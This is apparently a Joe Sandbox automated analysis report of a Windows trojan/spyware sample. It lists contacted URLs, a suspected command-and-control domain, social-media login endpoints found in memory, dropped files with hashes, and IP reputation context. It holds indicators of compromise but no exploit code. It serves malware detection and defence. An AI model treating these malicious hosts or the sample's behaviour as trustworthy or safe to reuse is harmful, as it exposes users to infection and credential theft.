https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
1a469593c1fe15dc.xyz	198.54.117.244	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://1a469593c1fe15dc.xyz/info/fb	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/step	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/dd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service.real.com/realplay	aOn5CfTiwS.exe, 00000000.00000003.226749595.00000000022AA000.00000004.00000001.sdmp	false		high
https://www.messenger.comaccept-language:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.msn.com	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh	aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1612058829275.exe, 00000001.00000002.224509570.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv71A3.tmp.1.dr	false		high
http://charlesproxy.com/ssl	6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gts1o1core0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://maps.windows.com/windows-app-web-link	ecv71A3.tmp.1.dr	false		high
http://www.msn.com/?ocid=iehp	ecv71A3.tmp.1.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv71A3.tmp.1.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn	ecv71A3.tmp.1.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://1a469593c1fe15dc.xyz/info/stepstatus=0&L	aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.nirsoft.net/	aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 1612058829275.exe.0.dr	false		high
http://ocsp.pki.goog/GTSGIAG30	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/wd=488x1043;	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_engine.dll.0.dr	false		high
http://www.xunlei.com/GET	download_engine.dll.0.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB	aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.nc	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/origin:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv71A3.tmp.1.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv71A3.tmp.1.dr	false		high
https://support.google.	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/	ecv71A3.tmp.1.dr	false		high
http://ocsp.pki.goog/gsr202	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv71A3.tmp.1.dr	false		high
http://www.msn.com/	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv71A3.tmp.1.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv71A3.tmp.1.dr	false		high
https://www.instagram.comreferer:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/fb1.6	aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xunlei.com/	download_engine.dll.0.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh	aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	download_engine.dll.0.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	ecv71A3.tmp.1.dr	false		high
https://curl.haxx.se/docs/http-cookies.html	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.openssl.org/support/faq.html	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr	false		high
https://www.namecheap.com/assets/img/nc	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false		high
https://www.instagram.com/accounts/login/ajax/facebook/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	ecv71A3.tmp.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	xldl.dll.0.dr	false		high
http://exchangework%04d%02d%02d.xyz/accept:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/stepbidden	aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	aOn5CfTiwS.exe, 00000000.00000003.216601589.00000000022A8000.00000004.00000001.sdmp	false		high
http://1a469593c1fe15dc.xyz/info/ddpbidden	aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.synametrics.com	aOn5CfTiwS.exe	false		high
https://charlesproxy.com/ssl1	6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false		high
http://crl.pki.goog/GTSGIAG3.crl0	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	xldl.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://store.paycenter.uc.cnmail-attachment.googleusercontent.com	MiniThunderPlatform.exe.0.dr	false		high
http://1a469593c1fe15dc.xyz/info/fbX	aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0M	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c	ecv71A3.tmp.1.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f	aOn5CfTiwS.exe	false	Avira URL Cloud: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.117.244	unknown	United States		22612	NAMECHEAP-NETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	346349
Start date:	30.01.2021
Start time:	18:06:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	aOn5CfTiwS (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@10/16@7/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 95.8%) Quality average: 83% Quality standard deviation: 26.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.43.193.48, 23.210.248.85, 51.11.168.160, 92.122.213.194, 92.122.213.247, 67.26.83.254, 67.26.81.254, 67.27.159.126, 8.248.119.254, 8.241.9.254, 20.54.26.129, 51.104.146.109, 52.155.217.156 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.244	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	www.profille-sarina23tammara.club/ur06/?nt=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIm/nR1OhQf&2d=9rm4l4y
	JdtN8nIcLi8RQOi.exe	Get hash	malicious	Browse	www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf
	ordine.exe	Get hash	malicious	Browse	www.solidconstruct.site/jqc/?I6A=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEv/IosbvDuD9rCIw==&YL0=8pN4lD
	PT300975-inv.exe	Get hash	malicious	Browse	www.solidconstruct.site/jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD
	test.js	Get hash	malicious	Browse	101legit.com/0.html
	dsexplrob.exe	Get hash	malicious	Browse	i3mode.com/dbExpressversion/db87987Administrator.php?b=FKfEZOAdYedIVNeAlGKbCgFzoODmhh
	nbmvwchp.js	Get hash	malicious	Browse	101legit.com/0.html

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	PO_55004.exe	Get hash	malicious	Browse	68.65.122.156
	SecuriteInfo.com.Trojan.MulDrop16.10041.23448.exe	Get hash	malicious	Browse	185.61.153.111
	SecuriteInfo.com.Trojan.Inject4.6821.6799.exe	Get hash	malicious	Browse	199.188.200.150
	DCAjXz5y4I.exe	Get hash	malicious	Browse	162.213.255.196
	NEW ORDER.xlsm	Get hash	malicious	Browse	104.219.248.89
	Claim_250196008_01282021.xls	Get hash	malicious	Browse	162.0.226.110
	Claim_250196008_01282021.xls	Get hash	malicious	Browse	162.0.226.110
	lbqFKoALqe.exe	Get hash	malicious	Browse	198.54.117.215
	j64eIR1IEK.exe	Get hash	malicious	Browse	198.54.117.210
	document.doc	Get hash	malicious	Browse	199.193.7.228
	CMA CGM Shipping Documents COAU7014424560.xlsx	Get hash	malicious	Browse	198.54.117.215
	order.exe	Get hash	malicious	Browse	199.193.7.228
	SecuriteInfo.com.Heur.11979.xls	Get hash	malicious	Browse	162.0.226.110
	SecuriteInfo.com.Heur.11979.xls	Get hash	malicious	Browse	162.0.226.110
	#Ud83d#Udce9.htm	Get hash	malicious	Browse	198.54.115.249
	Pending Orders Statement -40064778.doc	Get hash	malicious	Browse	198.54.122.60
	documenting.doc	Get hash	malicious	Browse	198.54.122.60
	#B30COPY.htm	Get hash	malicious	Browse	198.54.115.249
	AE-808_RAJEN.exe	Get hash	malicious	Browse	68.65.122.156
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
